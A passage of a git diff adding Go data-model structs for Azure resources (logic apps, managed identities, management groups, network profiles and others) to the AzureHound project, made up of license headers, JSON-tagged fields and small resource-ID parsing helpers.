Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies settings related to VM Guest Patching on Linux. +type LinuxPatchSettings struct { + // Specifies the mode of VM Guest Patch Assessment for the IaaS virtual machine. + // Possible values are: + // ImageDefault - You control the timing of patch assessments on a virtual machine. + // AutomaticByPlatform - The platform will trigger periodic patch assessments. The property provisionVMAgent must be true. + AssessmentMode string `json:"assessmentMode,omitempty"` + + // Specifies the mode of VM Guest Patching to IaaS virtual machine or virtual machines associated to virtual machine scale set with OrchestrationMode as Flexible. + // Possible values are: + // ImageDefault - The virtual machine's default patching configuration is used. + // AutomaticByPlatform - The virtual machine will be automatically updated by the platform. The property provisionVMAgent must be true + PatchMode string `json:"patchMode,omitempty"` +} diff --git a/models/azure/locale_info.go b/models/azure/locale_info.go new file mode 100644 index 0000000..859e680 --- /dev/null +++ b/models/azure/locale_info.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type LocaleInfo struct { + // A locale code for the user, which includes the user's perferred language and country/region as defined + // in ISO 639-1 and ISO 3166-1 alpha-2. E.g. "en-us" + Locale string `json:"locale,omitempty"` + + // A name representing the user's locale in natural language. E.g. "English (United States)" + DisplayName string `json:"displayName,omitempty"` +} diff --git a/models/azure/logic_app.go b/models/azure/logic_app.go new file mode 100644 index 0000000..67d8527 --- /dev/null +++ b/models/azure/logic_app.go @@ -0,0 +1,49 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type LogicApp struct { + Entity + + Identity ManagedIdentity `json:"identity,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Properties LogicAppProperties `json:"properties,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s LogicApp) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s LogicApp) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/logic_app_definition.go b/models/azure/logic_app_definition.go new file mode 100644 index 0000000..2cff0bb --- /dev/null +++ b/models/azure/logic_app_definition.go @@ -0,0 +1,90 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type Definition struct { + Schema string `json:"$schema,omitempty"` + // Certain actions can be nested, have different elements based on the name(key) of given action - Condition is an example + // Actions map[string]Action `json:"actions,omitempty"` + Actions map[string]interface{} `json:"actions,omitempty"` + ContentVersion string `json:"contentVersion,omitempty"` + Outputs map[string]Output `json:"outputs,omitempty"` + Parameters map[string]Parameter `json:"parameters,omitempty"` + StaticResults map[string]StaticResult `json:"staticResults,omitempty"` + Triggers map[string]Trigger `json:"triggers,omitempty"` +} + +type Action struct { + Type string `json:"type"` + // Kind is missing in the MSDN, but returned and present in examples and during testing + Kind string `json:"kind,omitempty"` + Inputs map[string]interface{} `json:"inputs,omitempty"` + RunAfter interface{} `json:"runAfter,omitempty"` + RuntimeConfiguration interface{} `json:"runtimeConfiguration,omitempty"` + OperationOptions string `json:"operationOptions,omitempty"` +} + +type Output struct { + Type string `json:"type,omitempty"` + // Type of this is based on above Type + Value interface{} `json:"value,omitempty"` +} + +type Parameter struct { + Type string `json:"type,omitempty"` + DefaultValue interface{} `json:"defaultValue,omitempty"` + AllowedValues []interface{} `json:"allowedValues,omitempty"` + Metadata Metadata `json:"metadata,omitempty"` +} + +type Metadata struct { + Description interface{} `json:"description,omitempty"` +} + +type StaticResult struct { + Outputs ResultOutput `json:"outputs,omitempty"` + Status string `json:"status,omitempty"` +} + +type ResultOutput struct { + Headers map[string]string `json:"headers,omitempty"` + StatusCode string `json:"statusCode,omitempty"` +} + +type Trigger struct { + Type string `json:"type,omitempty"` + // Kind is missing in the MSDN, but returned and present in examples and during testing + Kind string `json:"kind,omitempty"` + // Inputs is a custom element based on the type of trigger + Inputs interface{} `json:"inputs,omitempty"` + Recurrence Recurrence `json:"recurrence,omitempty"` + Conditions []Condition `json:"conditions,omitempty"` + // Runtime configuration is a custom element based on the type of trigger + RuntimeConfiguration interface{} `json:"runtimeConfiguration,omitempty"` + SplitOn string `json:"splitOn,omitempty"` + OperationOptions string `json:"operationOptions,omitempty"` +} + +type Recurrence struct { + Frequency string `json:"frequency,omitempty"` + Interval int `json:"interval,omitempty"` +} + +type Condition struct { + Expression string `json:"expression,omitempty"` +} diff --git a/models/azure/logic_app_parameter.go b/models/azure/logic_app_parameter.go new file mode 100644 index 0000000..8cfc424 --- /dev/null +++ b/models/azure/logic_app_parameter.go @@ -0,0 +1,55 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type LogicAppParameter struct { + Description string `json:"description,omitempty"` + //Metadata - marked as object in MSDN, however no other description available - in testing was not able to return a value here + Metadata interface{} `json:"metadata,omitempty"` + Type enums.ParameterType `json:"type,omitempty"` + Value interface{} `json:"value,omitempty"` +} + +func (s LogicAppParameter) GetValue() interface{} { + switch s.Type { + case enums.ArrayType: + return s.Value.([]interface{}) + case enums.BoolType: + return s.Value.(bool) + case enums.FloatType: + return s.Value.(float64) + case enums.IntType: + return s.Value.(int) + case enums.NotSpecifiedType: + return s.Value + case enums.ObjectType: + return s.Value + case enums.SecureObjectType: + return s.Value + case enums.SecureStringType: + return s.Value + case enums.StringType: + return s.Value.(string) + default: + return s.Value + } +} diff --git a/models/azure/logic_app_properties.go b/models/azure/logic_app_properties.go new file mode 100644 index 0000000..af0dfec --- /dev/null +++ b/models/azure/logic_app_properties.go @@ -0,0 +1,51 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type LogicAppProperties struct { + AccessEndpoint string `json:"accessEndpoint,omitempty"` + ChangedTime string `json:"changedTime,omitempty"` + CreatedTime string `json:"createdTime,omitempty"` + Definition Definition `json:"definition,omitempty"` + IntegrationAccount ResourceReference `json:"integrationAccount,omitempty"` + // Note: in testing this does not get populated, instead the parameters are listed within the definition + Parameters map[string]LogicAppParameter `json:"parameters,omitempty"` + ProvisioningState enums.LogicAppProvisioningState `json:"provisioningState,omitempty"` + Sku LogicAppSku `json:"sku,omitempty"` + State enums.LogicAppState `json:"state,omitempty"` + Version string `json:"version,omitempty"` + + // This does not appear in the documentation, however, it gets populated in the response + EndpointConfiguration EndpointConfiguration `json:"endpointsConfiguration,omitempty"` +} + +type EndpointConfiguration struct { + LogicApp LogicAppEndpointConfiguration `json:"logicapp,omitempty"` + Connector LogicAppEndpointConfiguration `json:"connector,omitempty"` +} + +type LogicAppEndpointConfiguration struct { + OutgoingIpAddresses []AddressEndpointConfiguration `json:"outgoingIpAddresses,omitempty"` + AccessEndpointIpAddresses []AddressEndpointConfiguration `json:"accessEndpointIpAddresses,omitempty"` +} + +type AddressEndpointConfiguration struct { + Address string `json:"address,omitempty"` +} diff --git a/models/azure/logic_app_sku.go b/models/azure/logic_app_sku.go new file mode 100644 index 0000000..d492197 --- /dev/null +++ b/models/azure/logic_app_sku.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type LogicAppSku struct { + Name enums.SkuName `json:"name,omitempty"` + Plan ResourceReference `json:"plan,omitempty"` +} diff --git a/models/azure/mailbox_settings.go b/models/azure/mailbox_settings.go new file mode 100644 index 0000000..e395786 --- /dev/null +++ b/models/azure/mailbox_settings.go @@ -0,0 +1,48 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type MailboxSettings struct { + // Folder ID of an archive folder for the user. + ArchiveFolder string `json:"archiveFolder,omitempty"` + + // Configuration settings to automatically notify the sender of an incoming email with a message from the signed-in + // user. + AutomaticRepliesSetting AutomaticRepliesSetting `json:"automaticRepliesSetting,omitempty"` + + // The date format for the user's mailbox. + DateFormat string `json:"dateFormat,omitempty"` + + // If the user has a calendar delegate, this specifies whether the delegate, mailbox owner, or both receive meeting + // messages and meeting responses. + DelegateMeetingMessageDeliveryOptions enums.MessageDeliveryOptions `json:"delegateMeetingMessageDeliveryOptions,omitempty"` + + // The locale information for the user, including the preferred language and country/region. + Language LocaleInfo `json:"language,omitempty"` + + // The time format for the user's mailbox. + TimeFormat string `json:"timeFormat,omitempty"` + + // The default time zone for the user's mailbox. + TimeZone string `json:"timeZone,omitempty"` + + // The days of the week and hours in a specific time zone that the user works. + WorkingHours WorkingHours `json:"workingHours,omitempty"` +} diff --git a/models/azure/maintenance_redeploy_status.go b/models/azure/maintenance_redeploy_status.go new file mode 100644 index 0000000..2932bf4 --- /dev/null +++ b/models/azure/maintenance_redeploy_status.go @@ -0,0 +1,44 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// Maintenance operations status. +type MaintenanceRedeployStatus struct { + // True if customer is allowed to perform maintenance. + IsCustomerInitiatedMaintenanceAllowed bool `json:"isCustomerInitiatedMaintenanceAllowed,omitempty"` + + // Message returned for the last maintenance operation. + LastOperationMessage string `json:"lastOperationMessage,omitempty"` + + // The last maintenance operation result code. + LastOperationResultCode enums.MaintenanceOperationCode `json:"lastOperationResultCode,omitempty"` + + // End time for the maintenance window. + MaintenanceWindowEndTime string `json:"maintenanceWindowEndTime,omitempty"` + + // Start time for the maintenance window. + MaintenanceWindowStartTime string `json:"maintenanceWindowStartTime,omitempty"` + + // End time for the pre maintenance window. + PreMaintenanceWindowEndTime string `json:"preMaintenanceWindowEndTime,omitempty"` + + // Start time for the pre maintenance window. + PreMaintenanceWindowStartTime string `json:"preMaintenanceWindowStartTime,omitempty"` +} diff --git a/models/azure/managed_by_tenant.go b/models/azure/managed_by_tenant.go new file mode 100644 index 0000000..50b2087 --- /dev/null +++ b/models/azure/managed_by_tenant.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/gofrs/uuid" + +// Information about a tenant managing the subscription. +type ManagedByTenant struct { + // The tenant ID of the managing tenant. + TenantId uuid.UUID `json:"tenantId,omitempty"` +} diff --git a/models/azure/managed_cluster.go b/models/azure/managed_cluster.go new file mode 100644 index 0000000..e0aa74c --- /dev/null +++ b/models/azure/managed_cluster.go @@ -0,0 +1,52 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type ManagedCluster struct { + Entity + + ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Properties ManagedClusterProperties `json:"properties,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Plan Plan `json:"plan,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` + Zones []string `json:"zones,omitempty"` +} + +func (s ManagedCluster) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s ManagedCluster) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/managed_cluster_properties.go b/models/azure/managed_cluster_properties.go new file mode 100644 index 0000000..59d5bf7 --- /dev/null +++ b/models/azure/managed_cluster_properties.go @@ -0,0 +1,24 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Properties of the vault +type ManagedClusterProperties struct { + // The name of the AzureRM Resource Group the Managed Cluster's Virtual Machine Scale Set resides + NodeResourceGroup string `json:"nodeResourceGroup,omitempty"` +} diff --git a/models/azure/managed_disk_params.go b/models/azure/managed_disk_params.go new file mode 100644 index 0000000..f48da6f --- /dev/null +++ b/models/azure/managed_disk_params.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// The parameters of a managed disk. +type ManagedDiskParameters struct { + // Specifies the customer managed disk encryption set resource id for the managed disk. + DiskEncryptionSet DiskEncryptionSetParameters `json:"diskEncryptionSet,omitempty"` + + // Resource ID. + Id string `json:"id,omitempty"` + + // Specifies the storage account type for the managed disk. NOTE: UltraSSD_LRS can only be used with data disks, + // it cannot be used with OS Disk. + StorageAccountType enums.StorageType `json:"storageAccountType,omitempty"` +} diff --git a/models/azure/managed_identity.go b/models/azure/managed_identity.go new file mode 100644 index 0000000..ff0f946 --- /dev/null +++ b/models/azure/managed_identity.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// Deprecated, use ManagedIdentity +type VirtualMachineIdentity ManagedIdentity + +// Managed identity. +type ManagedIdentity struct { + // The principal id of the managed identity. The property will only be provided for a system assigned + // identity. + PrincipalId string `json:"principalId,omitempty"` + + // The tenant id associated with the managed identity. This property will only be provided for a system assigned + // identity. + TenantId string `json:"tenantId,omitempty"` + + // The type of identity used. + Type enums.Identity `json:"type,omitempty"` + + // The list of user identities associated with the Managed identity. The user identity dictionary key references will be + // ARM resource ids in the form: + // '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}' + UserAssignedIdentities map[string]UserAssignedIdentity `json:"userAssignedIdentities,omitempty"` +} diff --git a/models/azure/management_group.go b/models/azure/management_group.go new file mode 100644 index 0000000..761c7f5 --- /dev/null +++ b/models/azure/management_group.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ManagementGroup struct { + Entity + + // The name of the management group. E.g. 00000000-0000-0000-0000-000000000000 + Name string `json:"name,omitempty"` + + // The properties of the management group. + Properties ManagementGroupProperties `json:"properties,omitempty"` + + // The type of resource: "Microsoft.Management/managementGroups" + Type string `json:"type,omitempty"` +} diff --git a/models/azure/management_group_child_info.go b/models/azure/management_group_child_info.go new file mode 100644 index 0000000..4fab42b --- /dev/null +++ b/models/azure/management_group_child_info.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The child information of a management group. +type ManagementGroupChildInfo struct { + Children []ManagementGroupChildInfo `json:"children,omitempty"` + DisplayName string `json:"displayName,omitempty"` + Id string `json:"id,omitempty"` + Name string `json:"name,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/management_group_details.go b/models/azure/management_group_details.go new file mode 100644 index 0000000..a2f78cd --- /dev/null +++ b/models/azure/management_group_details.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ManagementGroupDetails struct { + Parent ParentGroupInfo `json:"parent,omitempty"` + Path []ManagementGroupPathElement `json:"path,omitempty"` + UpdatedBy string `json:"updatedBy,omitempty"` + UpdatedTime string `json:"updatedTime,omitempty"` + Version int `json:"version,omitempty"` +} diff --git a/models/azure/management_group_path_elem.go b/models/azure/management_group_path_elem.go new file mode 100644 index 0000000..95e53a5 --- /dev/null +++ b/models/azure/management_group_path_elem.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ManagementGroupPathElement struct { + DisplayName string `json:"displayName,omitempty"` + Name string `json:"name,omitempty"` +} diff --git a/models/azure/management_group_props.go b/models/azure/management_group_props.go new file mode 100644 index 0000000..4754107 --- /dev/null +++ b/models/azure/management_group_props.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The properties of the management group. +type ManagementGroupProperties struct { + // The list of children. + Children []ManagementGroupChildInfo `json:"children,omitempty"` + + // The details of the management group. + Details ManagementGroupDetails `json:"details,omitempty"` + + // The friendly name of the management group. + DisplayName string `json:"displayName,omitempty"` + + // The Azure AD Tenant ID associated with the management group. E.g. 00000000-0000-0000-0000-000000000000 + TenantId string `json:"tenantId,omitempty"` +} diff --git a/models/azure/name_value_pair.go b/models/azure/name_value_pair.go new file mode 100644 index 0000000..da041a3 --- /dev/null +++ b/models/azure/name_value_pair.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type NameValuePair struct { + Name string `json:"name,omitempty"` + Value string `json:"value,omitempty"` +} diff --git a/models/azure/network_interface_ref.go b/models/azure/network_interface_ref.go new file mode 100644 index 0000000..b43c6df --- /dev/null +++ b/models/azure/network_interface_ref.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a network interface reference. +type NetworkInterfaceReference struct { + // Resource ID. + Id string `json:"id,omitempty"` + + Properties NetworkInterfaceReferenceProperties `json:"properties,omitempty"` +} diff --git a/models/azure/network_interface_reference_props.go b/models/azure/network_interface_reference_props.go new file mode 100644 index 0000000..7737191 --- /dev/null +++ b/models/azure/network_interface_reference_props.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type NetworkInterfaceReferenceProperties struct { + // Specify what happens to the network interface when the VM is deleted. + DeleteOption enums.VMDeleteOption `json:"deleteOption,omitempty"` + + // Specifies the primary network interface in case the virtual machine has more than 1 network interface. + Primary bool `json:"primary,omitempty"` +} diff --git a/models/azure/network_profile.go b/models/azure/network_profile.go new file mode 100644 index 0000000..8c6ff82 --- /dev/null +++ b/models/azure/network_profile.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the network interfaces or the networking configuration of the virtual machine. +type NetworkProfile struct { + // Specifies the Microsoft.Network API version used when creating networking resources in the Network Interface + // Configurations. + NetworkApiVersion string `json:"networkApiVersion,omitempty"` + + // Specifies the networking configurations that will be used to create the virtual machine networking resources. + NetworkInterfaceConfigurations []VirtualMachineNetworkInterfaceConfiguration `json:"networkInterfaceConfigurations,omitempty"` + + // Specifies the list of resource Ids for the network interfaces associated with the virtual machine. + NetworkInterfaces []NetworkInterfaceReference `json:"networkInterfaces,omitempty"` +} diff --git a/models/azure/network_rule_set.go b/models/azure/network_rule_set.go new file mode 100644 index 0000000..5f27fe0 --- /dev/null +++ b/models/azure/network_rule_set.go @@ -0,0 +1,39 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// A set of rules governing the network accessibility of a vault. +type NetworkRuleSet struct { + // Tells what traffic can bypass network rules. This can be 'AzureServices' or 'None'. + // If not specified the default is 'AzureServices'. + Bypass enums.BypassOption `json:"bypass,omitempty"` + + // The default action when no rule from ipRules and from virtualNetworkRules match. + // This is only used after the bypass property has been evaluated. + DefaultAction enums.NetworkAction `json:"defaultAction,omitempty"` + + // The list of IP address rules. + IPRules []IPRule `json:"ipRules,omitempty"` + + // The list of virtual network rules. + VirtualNetworkRules []VirtualNetworkRule `json:"virtualNetworkRules,omitempty"` +} diff --git a/models/azure/object_identity.go b/models/azure/object_identity.go new file mode 100644 index 0000000..44569bb --- /dev/null +++ b/models/azure/object_identity.go @@ -0,0 +1,55 